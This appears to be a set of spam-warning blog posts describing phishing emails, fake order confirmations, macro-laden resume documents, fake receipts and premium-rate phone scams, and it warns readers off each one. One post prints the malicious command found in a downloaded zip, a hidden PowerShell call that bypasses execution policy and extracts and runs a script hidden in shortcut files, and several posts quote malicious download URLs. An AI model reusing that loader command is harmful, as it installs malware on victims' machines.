Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

This email has been spotted this week:

From: lou_weihe@clarityconfidenceandcash.com

Sent:                                                         Monday, July 30, 2018 10:52 PM

To:                                                            Recipient

Subject:                                                   Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

WOMEN MEN ACCESSORIES HOME DECOR GADGETS Hi Your Name, Great news! Your order is now confirmed. We will email you again when your items ship. Thanks for shopping with us! Order ID: 4M0A_8141 Shipping Address: Your Name Your Phone Your Postcode  View Order This email was sent from a notification-only address that cannot accept incoming emails. Please do not reply to this message. If you have any questions or concerns, please contact us

 

The 'view order' link points to: https://johanwolf.com/.advice/4M0A_8141-order-Receipt

Which downloads a file: 4M0A_8141-order-Receipt.zip

Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???

 

If you unzip the file that is provided you see an image:

 

 

Which presumably pretends to be a real company.

 

And a file which runs a script:

 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit

 

Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?

 

We will let you know.

 

Anyway, report the sender and the website and keep vigilant!

 

About a internship! Fake Resume or CV SPAM!

Microsoft Office documents are a dangerous source of macros and other types of malware. Typically a dangerous document will be disabled by later versions of Microsoft Office in order to protect the user and as a result the modern spam malware office docs have a front page explaining that they need to be unlocked.

Let's have a quick look at one:

Here is a message containing a resume we have received today...

Hello there! I hope you are well!

I am absolutely interested in a internship.
Find my attached resume and reply ASAP.

The password for the file is 123123

Looking forward to hearing back from you!
Dayna

If we double-click the attachment containing 'Danya's Resume' we see the password request in Microsoft Word 2016.

We enter the password provided and then...

The text in the document pane has actually been added by the spammers. That 'was this information helpful?' text is just an image captured from the Microsoft website just as we have captured this image from the spammers. The 'Yes' and 'No' buttons are not live - they are just there to persuade you that this is a Microsoft message. The text is there to persuade you to enable the macros in this document but definitely do not.

The only true Microsoft advice here is in yellow at the top where you are 'Be careful-email attachments can contain viruses. Unless you need to edit, it's safer to stay in protected view.' and it is. We would suggest that unless you are awaiting the document and it is from the person you are expecting it to be from, never enable a Microsoft Document for editing.

Let us make sure that this document is not one we are expecting - if we click on the File menu on Microsoft Word and select the Info option we can see the below:

As we can see from the details, this document is nonsense and is not from anyone we know or want to know.

Label these as spam and report the originator to your email administrator or provider.

We have seen the following alternate subjects for the same email:

1. About a career?
2. Concerning a internship.
3. Regarding a career!
4. Regarding a job?

Mac Detox Software - is it a good thing?

If you are a Mac user then you will find your computer slowing down just like anyone else's. There is a finite amount of processing power, RAM space and disk throughput that will eventually be maxed-out by the softwares you are running.

The Mac does not have a registry like Windows where the system needs all sorts of details to reference what processes are running and so it is not difficult to remove unwanted start-up programs.

There is a great article on what to do here: https://www.macworld.com/article/2047747/take-control-of-startup-and-login-items.html

MAc detox software - even if it is free - is coming at a cost, whether they are corrupting your browser search results or just recording your activity, you do not need proprietary software to clean a Mac.

We have been seeing a lot of sircles blog spam recently trying to add forwards and links to various Mac clean-up sites and we do not recommend using any. Stick to the trusted sites for information, such as MacWorld and keep your MAc clean of software that may cause more problems than your computer just being slow.

Natwest Spam: Incomplete Security Information

You may receive the following message, purporting to be from Natwest:

Disability Action Alliance - DAA Receipt#

Spam: Receipt # 255247

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.

Spam: Receipt # 255247

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.

Spam Warning: Shipment status changed for parcel #1188!

You may receive the following:

Spam Warning: Shipment status changed for parcel #1188!

A parcel was sent to you on 19/01/2018 via U.S. Postal Service Economy.

The following optional services were used:  Shipment status via email

You can view the tracking number and the delivery information on the tracking invoice enclosed below :

http://www.usps.com/shipping/trackandconfirm.htm ?action=download&trk_id=4209676728001104401363764606  

Thank you for shipping with USPS

******************************************************** ***************
NOTE:
 This e-mail was generated by USPS (www.usps.com)
 at the sender's request. 

Please contact 
 the sender of this e-mail or the U.S. Postal Service if you have 
 questions about the package delivery.

If you receive this message then it IS SPAM. The link above takes you to a file to download which can be harmful to your computer.

Following this being published, the file appears to have been removed.

Purchase Order No_18081994 - Fake Invoice PDFs with Spam URL Links

We have seen some fake purchase order emails today that have been modified in order to circumvent our latest advice on receiving bills by email. PDFs are the usual, preferred method but they can also be used to send links to potentially hazardous material and so, to clear up any confusion:

Do not open links from questionable senders in any format!

Phone number email spams

Watch out for these emails trying to get you to phone an expensive number:

Name : Sophie Morgan

Email : morgan.sophie@writeme.com

Tel: 8712771062

Message : Please call me on +44 8712771062

If you email the address above you receive:

Subject: Auto-Reply

Hi, unfortunately I am unable to reply to your e-mail at the moment.

Please call me on +44 8714340521 Kind regards Sophie Morgan

The phone number is simply an expensive telephone call from which they will pocket a few pence - DO NOT CALL THIS NUMBER!!!

The postal address Address: Wye St, London SW11 2HB, UK and email: jessica.mitchell@post.com now seem to be prevalent with this spam post. It is simply an adjustment to avoid spam filtering, but the phone number is not so easily changed as it is obviously a custom-registered number to send them money. Our advice is to filter based on the phone number, with and without +44.

One of the most annoying issues with this is that the numbers cannot be easily identified or the owners tracked down and held responsible as reverse look-up on these numbers relies on the number having been published in the first place and there is no publicly available register such as with domain names (although these are largely suppressed now - wrongly, in our opinion) and so there is little immediate action that can be taken.

The latest versions of these emails are now appearing as:

Name :  Nisha

Email :  nisha@matridtech.net

Tel:  +1-855-370-5507

Message :   May I Have the privilege of Connecting with you?

As you can see from the above they are US numbers in this example.

If you have any questions regarding spam or require any assistance, you can use the messenger icon at the bottom of the screen or contact us at https://www.sircles.net